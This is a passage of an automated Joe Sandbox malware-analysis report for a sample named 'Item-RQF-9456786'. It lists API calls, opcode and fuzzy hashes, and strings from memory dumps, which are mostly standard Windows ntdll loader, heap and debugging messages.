                                                                                    • Source File: 00000005.00000002.2560619920.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: eac7b7826e2e82e196d20feb5be9869bea6dc39668a5f8f93e263b85d279cf1c
                                                                                    • Instruction ID: b3be6f7f5ff34612ff60280c3b59d211808fe4b98d0b62fcec47ff2f40797470
                                                                                    • Opcode Fuzzy Hash: eac7b7826e2e82e196d20feb5be9869bea6dc39668a5f8f93e263b85d279cf1c
                                                                                    • Instruction Fuzzy Hash: ECE039B22403147BD610EE99EC41E9B73ACDB89710F004419F909A7241D670BD118AB9

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 332 42cf43-42cf87 call 404a93 call 42de23 RtlFreeHeap
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8B00017E,00000007,00000000,00000004,00000000,004174C9,000000F4), ref: 0042CF82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2560619920.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: 10e78dc5911c11bf1ba16f4a6a310104beaa8b86ec4fe8ff6c030c8a8362ebdc
                                                                                    • Instruction ID: d6a9bdd63f4f4726a4f331dfe5c9c3aba03416bc2634274821a0415808f0b8d2
                                                                                    • Opcode Fuzzy Hash: 10e78dc5911c11bf1ba16f4a6a310104beaa8b86ec4fe8ff6c030c8a8362ebdc
                                                                                    • Instruction Fuzzy Hash: 0CE039722042047BCA10EE99EC41E9B73ACDB89710F404419F908A7242CA74BD118BB9

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 342 42cf93-42cfcc call 404a93 call 42de23 ExitProcess
                                                                                    APIs
                                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,4C682FD1,?,?,4C682FD1), ref: 0042CFC7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2560619920.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitProcess
                                                                                    • String ID:
                                                                                    • API String ID: 621844428-0
                                                                                    • Opcode ID: 29ef5902dada31c0efd50ea4dfcdabab1ca2a9874f0cc1926969f46f9267d81a
                                                                                    • Instruction ID: aa517b7c2c5972063ed582803f30848c75afd338206d8a6d8b9faa30a86bf147
                                                                                    • Opcode Fuzzy Hash: 29ef5902dada31c0efd50ea4dfcdabab1ca2a9874f0cc1926969f46f9267d81a
                                                                                    • Instruction Fuzzy Hash: D1E086323006147BD620EA5AEC41F9BB76CDFC5714F008419FE0C6B145C671BA0187F4

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 347 17e2c0a-17e2c0f 348 17e2c1f-17e2c26 LdrInitializeThunk 347->348 349 17e2c11-17e2c18 347->349
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 1fdcfefc7d0969e85db29157ef8824090cb33c9324354dd062cd74acd2e58627
                                                                                    • Instruction ID: e459c39f64e16b2b85943c9682b89611a3127dd16eed8a43c9003c9788d0d412
                                                                                    • Opcode Fuzzy Hash: 1fdcfefc7d0969e85db29157ef8824090cb33c9324354dd062cd74acd2e58627
                                                                                    • Instruction Fuzzy Hash: B2B09B719055C5C5DF11E764460C717B954B7D5701F15C075D3030652F4738C1E5E276
                                                                                    Strings
                                                                                    • a NULL pointer, xrefs: 01858F90
                                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01858DB5
                                                                                    • an invalid address, %p, xrefs: 01858F7F
                                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01858E4B
                                                                                    • This failed because of error %Ix., xrefs: 01858EF6
                                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01858D8C
                                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01858FEF
                                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01858E3F
                                                                                    • The resource is owned shared by %d threads, xrefs: 01858E2E
                                                                                    • *** enter .cxr %p for the context, xrefs: 01858FBD
                                                                                    • *** then kb to get the faulting stack, xrefs: 01858FCC
                                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01858F26
                                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01858DD3
                                                                                    • The instruction at %p referenced memory at %p., xrefs: 01858EE2
                                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01858DA3
                                                                                    • *** enter .exr %p for the exception record, xrefs: 01858FA1
                                                                                    • The resource is owned exclusively by thread %p, xrefs: 01858E24
                                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 01858E02
                                                                                    • The critical section is owned by thread %p., xrefs: 01858E69
                                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01858E86
                                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01858F2D
                                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 01858F3F
                                                                                    • read from, xrefs: 01858F5D, 01858F62
                                                                                    • *** Inpage error in %ws:%s, xrefs: 01858EC8
                                                                                    • The instruction at %p tried to %s , xrefs: 01858F66
                                                                                    • write to, xrefs: 01858F56
                                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01858F34
                                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01858DC4
                                                                                    • <unknown>, xrefs: 01858D2E, 01858D81, 01858E00, 01858E49, 01858EC7, 01858F3E
                                                                                    • Go determine why that thread has not released the critical section., xrefs: 01858E75
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                    • API String ID: 0-108210295
                                                                                    • Opcode ID: b89cedf8d3788ef30f2befc918ec15b33707db393a09e997559fbdb226a73289
                                                                                    • Instruction ID: e332aaa86af41261327f20e9eb0deae448956bae1f9aa59d1c318e239dab60d2
                                                                                    • Opcode Fuzzy Hash: b89cedf8d3788ef30f2befc918ec15b33707db393a09e997559fbdb226a73289
                                                                                    • Instruction Fuzzy Hash: 7D8118B5A40214BFDF129A2ADC55D7B7F36EF5BB14F010049FA09EF212E3718A41D662
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-2160512332
                                                                                    • Opcode ID: 3370b0c79cc6af109aebda36bf76147de2f193e5f961144e6cfe0a32d319c95e
                                                                                    • Instruction ID: 8af1926595144e664719099c543d6239645a31c6f83af2fda7198fb7c8928c53
                                                                                    • Opcode Fuzzy Hash: 3370b0c79cc6af109aebda36bf76147de2f193e5f961144e6cfe0a32d319c95e
                                                                                    • Instruction Fuzzy Hash: 5B92E371604352AFE722CF28C884F6BB7E9BB88714F04492DFA94D7251D770EA84CB52
                                                                                    Strings
                                                                                    • Critical section address, xrefs: 01815425, 018154BC, 01815534
                                                                                    • double initialized or corrupted critical section, xrefs: 01815508
                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0181540A, 01815496, 01815519
                                                                                    • 8, xrefs: 018152E3
                                                                                    • Invalid debug info address of this critical section, xrefs: 018154B6
                                                                                    • undeleted critical section in freed memory, xrefs: 0181542B
                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 01815543
                                                                                    • Thread identifier, xrefs: 0181553A
                                                                                    • Critical section debug info address, xrefs: 0181541F, 0181552E
                                                                                    • Address of the debug info found in the active list., xrefs: 018154AE, 018154FA
                                                                                    • Critical section address., xrefs: 01815502
                                                                                    • corrupted critical section, xrefs: 018154C2
                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154CE
                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                    • API String ID: 0-2368682639
                                                                                    • Opcode ID: a64d938aae27370ced7129eb08e7b3357543e7c48eb416baa0db35d11cd753cd
                                                                                    • Instruction ID: db0cd0de0ea2dabeb252157a6494e28ae737315525ad82744414c8c8d37dbc90
                                                                                    • Opcode Fuzzy Hash: a64d938aae27370ced7129eb08e7b3357543e7c48eb416baa0db35d11cd753cd
                                                                                    • Instruction Fuzzy Hash: 8581ADB2A80348EFDB20CF99C854BAEFBB9BB49714F544119F504F7685D371AA40CB91
                                                                                    Strings
                                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01812412
                                                                                    • @, xrefs: 0181259B
                                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018122E4
                                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 0181261F
                                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01812498
                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018125EB
                                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01812409
                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01812506
                                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01812602
                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01812624
                                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018124C0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                    • API String ID: 0-4009184096
                                                                                    • Opcode ID: 159438d2c73410483c86874a606c57efd151670b0af3099b3fcd80cf20afff51
                                                                                    • Instruction ID: 0bff5b4e52c41f9f11f252153d8381a95195ca85b7903b323f6f691ad1b6a74a
                                                                                    • Opcode Fuzzy Hash: 159438d2c73410483c86874a606c57efd151670b0af3099b3fcd80cf20afff51
                                                                                    • Instruction Fuzzy Hash: 38026EF2D002299BDB21DB54CC84BDAF7B8AB54704F1041DAE60DA7246EB709F85CF59
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                    • API String ID: 0-2515994595
                                                                                    • Opcode ID: 6e5f8f03f5957edf70b373030a5b55bddc7efbf5a7d230236879ddfaaf0042e4
                                                                                    • Instruction ID: 5b11e349eb1539affaa253d6224e38101eef20c4b79da48520774aef80490471
                                                                                    • Opcode Fuzzy Hash: 6e5f8f03f5957edf70b373030a5b55bddc7efbf5a7d230236879ddfaaf0042e4
                                                                                    • Instruction Fuzzy Hash: 1851CEB15093099BC729DF58C848BABBBE8EF95344F14492DE999C3241EB70D604CB96
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                    • API String ID: 0-3197712848
                                                                                    • Opcode ID: 1726d5b4a9b65977f40a3ba479954f302fc6a2e24868fb809c1a4697265c6640
                                                                                    • Instruction ID: 02a1d91e31ed213ffc05e05c22e340f14234094710e08b0773a8d4b70d1986f2
                                                                                    • Opcode Fuzzy Hash: 1726d5b4a9b65977f40a3ba479954f302fc6a2e24868fb809c1a4697265c6640
                                                                                    • Instruction Fuzzy Hash: 2A12E171A083468FD725EF28C884BEAF7E4BF85714F08095DF9858B291E734DA44CB52
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                    • API String ID: 0-1700792311
                                                                                    • Opcode ID: 16eef42e35897a9cfe0ed727799daf385c67720d2541158dda97b48029461310
                                                                                    • Instruction ID: 1409db73d74ced25fe829667a40be196cfba52db31bbbf0763e4cd3842ae7b6d
                                                                                    • Opcode Fuzzy Hash: 16eef42e35897a9cfe0ed727799daf385c67720d2541158dda97b48029461310
                                                                                    • Instruction Fuzzy Hash: DDD1CA7150068AEFDB62DF68D494AAEFBF1FF49718F088049F8459B312C7349A85CB10
                                                                                    Strings
                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01828A67
                                                                                    • VerifierFlags, xrefs: 01828C50
                                                                                    • HandleTraces, xrefs: 01828C8F
                                                                                    • VerifierDebug, xrefs: 01828CA5
                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01828A3D
                                                                                    • VerifierDlls, xrefs: 01828CBD
                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 01828B8F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                    • API String ID: 0-3223716464
                                                                                    • Opcode ID: 3cdba77b6551707215038fd198ff2c64ac01dc10ade1584a87f916c71cf5ae2a
                                                                                    • Instruction ID: 29775bbd1fe31c951cd8018c090955bd3ee2bcce6d09112f024b4ac44e676da0
                                                                                    • Opcode Fuzzy Hash: 3cdba77b6551707215038fd198ff2c64ac01dc10ade1584a87f916c71cf5ae2a
                                                                                    • Instruction Fuzzy Hash: FF914871A453269FEB23DF68C880B1AB7E4AB56B14F09045DFA41EB241C7709B84CB91
                                                                                    Strings
                                                                                    • ***Exception thrown within loader***, xrefs: 01824E27
                                                                                    • LdrpGenericExceptionFilter, xrefs: 01824DFC
                                                                                    • LdrpProtectedCopyMemory, xrefs: 01824DF4
                                                                                    • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01824E38
                                                                                    • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01824DF5
                                                                                    • Execute '.cxr %p' to dump context, xrefs: 01824EB1
                                                                                    • minkernel\ntdll\ldrutil.c, xrefs: 01824E06
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                    • API String ID: 0-2973941816
                                                                                    • Opcode ID: 1c1c500c76fdaec39d85547d8e4f3fb9bfda33b34006f6a9cd7b060111c966a1
                                                                                    • Instruction ID: 22630c66154e43b561a36ae250da2e26f0649ee5b87359f87439ec75bbd841f5
                                                                                    • Opcode Fuzzy Hash: 1c1c500c76fdaec39d85547d8e4f3fb9bfda33b34006f6a9cd7b060111c966a1
                                                                                    • Instruction Fuzzy Hash: 6B2198BA1881257BF72AAB6CDC4AD26FB9CFB41F70F140105F222D6680C590DF80C232
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                    • API String ID: 0-1109411897
                                                                                    • Opcode ID: 3f1dde68de39c76be59161bcd304b477d2e5027aad8928fac2069f9d60fa57f3
                                                                                    • Instruction ID: 34346c81525637b59a0d8f946af4884f9f2eff56466dc3f9fca8a4001475ddfd
                                                                                    • Opcode Fuzzy Hash: 3f1dde68de39c76be59161bcd304b477d2e5027aad8928fac2069f9d60fa57f3
                                                                                    • Instruction Fuzzy Hash: A6A23B74A0562A8FDB65DF18CC887ADFBB5AF85304F5442E9D90DA7290DB309E85CF40
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-792281065
                                                                                    • Opcode ID: 79361569d3b3ec22c7c746b0cc041bcdf7b86f73da55cc01b31e9fa18623a4c0
                                                                                    • Instruction ID: 364d9d1f0641d17039d6551c71febc1b4acacf259418f9ecdf1ff633e49260e3
                                                                                    • Opcode Fuzzy Hash: 79361569d3b3ec22c7c746b0cc041bcdf7b86f73da55cc01b31e9fa18623a4c0
                                                                                    • Instruction Fuzzy Hash: 8A915C71B403159BEB35DF58D848BAEBBB5BB40B24F180129FA01A7289D7744B41CBD1
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 017F9A11, 017F9A3A
                                                                                    • apphelp.dll, xrefs: 01796496
                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017F9A01
                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017F9A2A
                                                                                    • LdrpInitShimEngine, xrefs: 017F99F4, 017F9A07, 017F9A30
                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017F99ED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-204845295
                                                                                    • Opcode ID: 8df74b2bb7350d07e0666e991c4b7db117afc9424b8afa64b7fcbcf70c94a6f9
                                                                                    • Instruction ID: 2b4994b7621936471a9f91e32675e67dc876b61253dac830753d33a829657812
                                                                                    • Opcode Fuzzy Hash: 8df74b2bb7350d07e0666e991c4b7db117afc9424b8afa64b7fcbcf70c94a6f9
                                                                                    • Instruction Fuzzy Hash: 5251B2712483019FEB25DF24D895B9BF7E4FF84748F14091DFA8597265E630EA08CB92
                                                                                    Strings
                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 01812160, 0181219A, 018121BA
                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0181219F
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018121BF
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01812178
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 01812165
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01812180
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                    • API String ID: 0-861424205
                                                                                    • Opcode ID: d632fb744078241de71e70ab12834ba7790d1c2dcc2582e67cfb70fbd03b1913
                                                                                    • Instruction ID: 2667dae5321faeaf1b90dbdbbd6d15954921ab9c0823a39e3cbbd7adae10a5df
                                                                                    • Opcode Fuzzy Hash: d632fb744078241de71e70ab12834ba7790d1c2dcc2582e67cfb70fbd03b1913
                                                                                    • Instruction Fuzzy Hash: ED313576F802297BEB21DA998C81F5AFB7DDF65B50F250059FB05EB105D270AB01C3A1
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 017DC6C3
                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 018181E5
                                                                                    • LdrpInitializeProcess, xrefs: 017DC6C4
                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 01818170
                                                                                    • LdrpInitializeImportRedirection, xrefs: 01818177, 018181EB
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01818181, 018181F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 0-475462383
                                                                                    • Opcode ID: 5114eec50e239e8a8d000d00e07f69ebbe7895b0041cf688b994034da0d95559
                                                                                    • Instruction ID: f6997fc0e2f137ebe38b47aef82d6781814bd5dff79401570e42a0f2db679e18
                                                                                    • Opcode Fuzzy Hash: 5114eec50e239e8a8d000d00e07f69ebbe7895b0041cf688b994034da0d95559
                                                                                    • Instruction Fuzzy Hash: 5F3117B26443469FC215EF2CDC4AE1AF7E4EF94B10F04055CF9459B299E620EE04C7A2
                                                                                    APIs
